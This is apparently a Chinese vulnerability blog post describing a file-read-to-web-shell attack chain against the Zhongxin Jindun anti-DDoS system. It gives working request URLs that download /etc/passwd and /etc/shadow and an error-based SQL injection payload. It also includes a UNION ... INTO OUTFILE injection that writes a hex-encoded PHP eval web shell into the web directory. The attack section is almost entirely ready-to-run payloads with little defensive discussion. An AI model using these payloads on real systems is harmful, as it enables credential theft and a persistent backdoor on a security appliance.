中新金盾抗拒绝服务系统GetShell漏洞

  • A+
所属分类:漏洞时代
摘要

任意文件下载漏洞:https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/passwd


漏洞作者: Tea

任意文件下载漏洞:

https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/passwd

https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/shadow

中新金盾抗拒绝服务系统GetShell漏洞

SQL注入漏洞(数量不少,其他文件用的addslashes()呢?咋不用了。):

攻击分析菜单里面的列表-->

查询主机,都存在注入,这里只列一个。

POC:

'and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

中新金盾抗拒绝服务系统GetShell漏洞

中新金盾抗拒绝服务系统GetShell漏洞

GetWebshell:

首先通过下载任意文件漏洞下载源码文件,获得Web路径:

/xxx/usx/XXXx/

再通过SQL注入导出文件到WEB目录:

https://1.1.1.1:28XX3/cgi-bin/index.php?t=analysis_attack&c=getAttDetailById&_=1119844506390&o=json&id=-54' Union select 0x3c3f706870206576616c28245f504f53545b277a275d293b3f3e,2,3,4 from mysql.user into outfile '/xxx/usx/XXXx/z.php'%23

中新金盾抗拒绝服务系统GetShell漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: